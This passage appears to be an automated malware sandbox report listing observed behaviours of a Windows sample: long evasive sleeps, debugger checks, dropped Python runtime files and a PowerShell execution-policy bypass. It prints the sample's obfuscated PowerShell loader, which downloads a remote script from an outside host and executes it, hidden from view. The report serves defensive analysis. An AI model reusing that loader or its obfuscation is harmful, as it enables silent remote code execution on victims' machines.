Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Temp\PyEnv\python.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 19_2_00007FFF7FE406AA rdtsc

19_2_00007FFF7FE406AA

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8778	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1092	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2043	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7781	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1665	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_msi.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_socket.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-arm64.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\winsound.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\select.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\sqlite3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_ctypes.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-32.exe	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip3.11.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_decimal.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_zoneinfo.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_elementtree.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip3.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_uuid.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_lzma.pyd	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\pythonw.exe	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\wheel.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\vcruntime140_1.dll	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-64.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\python3.dll	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip.exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Temp\PyEnv\python.exe

API coverage: 0.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208	Thread sleep count: 8778 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208	Thread sleep count: 1092 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2532	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2892	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 19_2_00007FFF7F442F0F GetSystemInfo,

19_2_00007FFF7F442F0F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000013.00000002.1690428797.000001CE4EA36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.2449235586.0000025F44641000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: python.exe, 00000018.00000003.1991835043.0000023C74178000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %gQK66H^kcZX{J>1pQhSQTSlWe7@vjq3_MrUY$u{gBTp0045XL5u&j5sQL_^GPvMCI;LghUqliD!*LQ
Source: python.exe, 00000018.00000003.1976661205.0000023C7443F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.1976455491.0000023C74231000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.1991835043.0000023C74178000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: O6iLw__29OCM;fvc#;ec+Ou(<^xXvmhT+;$l_e8D(S(2K&^t}w#p48slp(aJDTEhT8hGFSpIpFw8uvR
Source: python.exe, 00000018.00000003.2060621815.0000023C7437D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2063316044.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2081360107.0000023C7437A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2123104403.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2067241943.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2075816910.0000023C7437D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2107014994.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2116261303.0000023C7437A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2016923190.0000023C74378000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2120229856.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2027368506.0000023C74356000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: python.exe, 00000018.00000003.1991835043.0000023C74178000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 66H^kcZX{J>1pQhSQTSlWe7@vjq3_MrUY$u{gBTp0045XL5u&j5sQL_^GPvMCI;LghUqliD!*LQ
Source: powershell.exe, 00000013.00000002.1690428797.000001CE4E9A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: python.exe, 00000018.00000003.1976661205.0000023C7443F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.1976455491.0000023C74231000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =940*f(9aw=t3>!eo#71%EE_{Sbu?#ga%Jg1{-L+mGTvOntXW6Q`I=-&}If^)aaBN^PU^eE+Hgfslcs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 19_2_00007FFF7FE406AA rdtsc

19_2_00007FFF7FE406AA

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Temp\PyEnv\python.exe

Code function: 24_0_00007FF70C4917B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

24_0_00007FF70C4917B8

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Temp\PyEnv\python.exe	Code function: 24_0_00007FF70C491964 SetUnhandledExceptionFilter,	24_0_00007FF70C491964
Source: C:\Temp\PyEnv\python.exe	Code function: 24_0_00007FF70C4912B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_0_00007FF70C4912B4
Source: C:\Temp\PyEnv\python.exe	Code function: 24_0_00007FF70C4917B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_0_00007FF70C4917B8
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806880B68 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF806880B68
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806880240 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF806880240
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068A2BC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF8068A2BC0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068A2600 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF8068A2600
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068D3CB0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF8068D3CB0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068D36E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF8068D36E0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068FAAA8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF8068FAAA8
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068FA060 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF8068FA060
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806920AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF806920AA8
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80C831AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF80C831AC0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80C8314F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF80C8314F0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80C891B00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF80C891B00
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80C891530 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF80C891530

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.py	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
